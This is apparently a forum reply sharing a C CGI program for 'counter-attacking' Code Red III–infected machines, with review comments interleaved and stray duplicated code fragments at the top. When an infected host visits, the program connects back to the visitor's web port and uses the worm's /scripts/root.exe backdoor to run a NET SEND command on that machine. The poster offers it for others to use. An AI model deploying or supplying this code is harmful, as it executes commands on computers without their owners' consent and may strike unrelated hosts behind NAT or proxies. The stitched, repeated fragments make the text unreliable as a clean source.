/* Message to pop up */
char msg[] = "NET SEND localhost \"***WARNING*** Your computer seems to be cracked by Code Red III. This message has been sent thru the backdoor of it. So, YOU MUST CLEAN UP YOUR SYSTEM. For more information, please check the following URL: http://www.incidents.org/react/code_red.php\"\r\n";
struct sockaddr_in addr;
struct hostent *host;
int open_sock(int sock, char *server, int port)
{
struct sockaddr_in addr;
struct hostent *dest;
Re:back door (スコア:2, 興味深い)
うーん、被感染サーバを持っていないので、本物でテストしてないけど、こんなところでいいのかな?
著作権主張もしません。
char msg[] = の所は改行を入れずに書いてね。
>モデレータの方、もしこういうコード公開がまずかったら削除してください。
/* messaging default.ida for Code Red III */
/* Tested on Linux 2.2 with libc5 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
/* TCP port the request is sent to on the peer (the HTTP port; the page
 * calls it the backdoor port because the backdoor is reached through the
 * peer's own web server). */
#define WWW 80
/* Request line and headers sent to the peer; %d receives the length of the
 * request body (msg). /scripts/root.exe is the path this page treats as the
 * worm's backdoor.
 * NOTE(review): for defenders, any request for /scripts/root.exe in a web
 * server log is worth alerting on -- presumably the file only exists on a
 * compromised host; confirm against the worm analysis you rely on. */
#define CMD "POST /scripts/root.exe HTTP/1.0\r\nContent-Length: %d\r\n\r\n"
/* Scratch buffer that main() formats the request header into. */
char buf[1024];
/* Message to pop up: the request body. It is a single NET SEND command line
 * terminated by CRLF and must stay on one source line (no line breaks inside
 * the string literal). */
char msg[] = "NET SEND localhost \"***WARNING*** Your computer seems to be cracked by Code Red III. This message has been sent thru the backdoor of it. So, YOU MUST CLEAN UP YOUR SYSTEM. For more information, please check the following URL: http://www.incidents.org/react/code_red.php\"\r\n";
/* NOTE(review): these two file-scope objects are not referenced anywhere in
 * the code shown; open_sock() declares its own locals for the same purpose. */
struct sockaddr_in addr;
struct hostent *host;
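/**
 * Resolve `server` and connect an existing socket to it.
 *
 * @param sock   Stream socket created by the caller.
 * @param server Host name or dotted-quad IPv4 address, NUL-terminated.
 * @param port   TCP port in host byte order.
 * @return 0 on success; -1 if `server` cannot be turned into an IPv4
 *         address (the socket is left open); -2 if connect() fails (the
 *         socket has been closed by this function).
 *
 * Changes from the original:
 *  - inet_addr() returns an unsigned in_addr_t, so the original `< 0` test
 *    could never fire and an unparsable address was silently used as
 *    255.255.255.255; the result is now compared with INADDR_NONE.
 *  - The resolver result is only copied when it is an IPv4 address of the
 *    expected length, so a larger h_length cannot overrun sin_addr.
 *  - A NULL `server` is rejected instead of being passed to the resolver.
 *  - memset/memcpy replace the legacy bzero/bcopy calls.
 */
int open_sock(int sock, char *server, int port)
{
    struct sockaddr_in peer;
    struct hostent *dest;

    if (server == NULL) {
        fprintf(stderr, "gethostbyname(): no host given\n");
        return (-1);
    }

    memset(&peer, 0, sizeof(peer));
    peer.sin_family = AF_INET;
    peer.sin_port = htons((unsigned short)port);

    dest = gethostbyname(server);
    if (dest != NULL) {
        /* Trust the resolver only as far as the destination field allows. */
        if (dest->h_addrtype != AF_INET ||
            dest->h_length != (int)sizeof(peer.sin_addr) ||
            dest->h_addr_list == NULL || dest->h_addr_list[0] == NULL) {
            fprintf(stderr, "gethostbyname(): unsupported address type\n");
            return (-1);
        }
        memcpy(&peer.sin_addr, dest->h_addr_list[0], sizeof(peer.sin_addr));
    } else {
        /* Fall back to a literal dotted-quad parse, as the original did. */
        peer.sin_addr.s_addr = inet_addr(server);
        if (peer.sin_addr.s_addr == INADDR_NONE) {
            /* gethostbyname() reports through h_errno, not errno, so
             * perror() would print an unrelated message here. */
            fprintf(stderr, "gethostbyname(): cannot resolve host\n");
            return (-1);
        }
    }

    if (connect(sock, (struct sockaddr *)&peer, sizeof(peer)) == -1) {
        perror("connect()");
        close(sock);
        return (-2);
    }
    return 0;
}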
/*
 * CGI entry point. Answers the incoming request with a redirect, then opens
 * a TCP connection back to the requesting address on port WWW and sends the
 * CMD request followed by msg. Every failure path exits silently with
 * status 0, so nothing is reported to the web server.
 *
 * argc and argv are not used; the only input is the REMOTE_ADDR environment
 * variable.
 *
 * NOTE(review): REMOTE_ADDR is the peer address as the web server saw it.
 * Behind a proxy or NAT gateway that is not necessarily the infected
 * machine, so the request goes to whatever answers on port 80 at that
 * address. Logging REMOTE_ADDR and reporting it to the owner of the network
 * reaches the same goal without touching the remote host.
 */
int main(int argc, char *argv[])
{
int s;
int l;
char *remote_addr;
/* CGI response header: a Location header followed by the blank line that
 * ends the CGI header block. It is written before any of the checks below,
 * so the client is redirected whether or not the rest succeeds. */
printf("Location: http://www.microsoft.com/\n\n"); /* Redirect :-) */
/* Check remote addr: without REMOTE_ADDR there is nothing to connect to. */
if ((remote_addr = getenv("REMOTE_ADDR")) == NULL) {
exit(0);
}
/* Open socket */
if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
exit(0);
}
/* open_sock() returns a negative value on failure. */
if (open_sock(s, remote_addr, WWW) < 0) {
exit(0);
}
/* Make request: format the header with the body length.
 * NOTE(review): strlen() returns size_t but CMD formats it with %d; the
 * argument should be cast to int. The snprintf() result is also used as the
 * send length without checking for a negative return or truncation. */
l = snprintf(buf, sizeof(buf), CMD, strlen(msg));
/* Send Request. NOTE(review): neither send() return value is checked, so a
 * short or failed write goes unnoticed. */
send(s, buf, l, 0); /* POST Command / Length Header */
send(s, msg, strlen(msg), 0); /* Message */
/* Close without reading the response. */
close(s);
return 0;
}
kaokun